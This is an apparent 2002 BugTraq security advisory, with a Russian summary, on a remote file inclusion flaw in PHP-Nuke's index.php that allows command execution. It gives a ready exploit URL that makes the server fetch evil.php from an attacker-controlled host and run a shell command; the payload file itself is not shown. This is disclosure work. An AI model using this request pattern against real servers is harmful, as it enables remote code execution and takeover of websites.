To: BugTraq Subject: PHP-Nuke allows Command Execution & Much more Date: Jan 17 2002 1:30AM Author: Handle Nopman Message-ID: <20020116183053.5335.qmail@hackermail.com> Hi All! I've found a serious security flaw in PHP-Nuke. It allows user to execute any PHP code. The flaw is in the index.php's include file feature. It allows including files like index.php?file=file It prevents users including ..'s in URL's, but it didn't prevent users from entering http://-urls Remember the PHP's remote get feature... How to exploit: Upload this file to some free web space provider or setup your own server: Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al will execute ls -al command. I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies) Vendor status: I contacted the author on 28.12.2001 and he hasn't replied. Sincrely "Nopman" Сценарий 'index.php' в PHP-Nuke имеет особенность, которая позволяет пользователям включать файлы. Из-за неправильной проверки ввода, возможно включить файлы, расположенные на удаленном сервере. Может быть выполнен произвольный код во включенном файле. Как одно последствие этой проблемы, удаленный нападающий может выполнять команды на уязвимом сервере. Команды будут выполнены с привилегиями web сервера, в результате чего нападающий может получить местный досуп. Уязвимость найдена в Francisco Burzi PHP-Nuke 1.0-5.3.1 |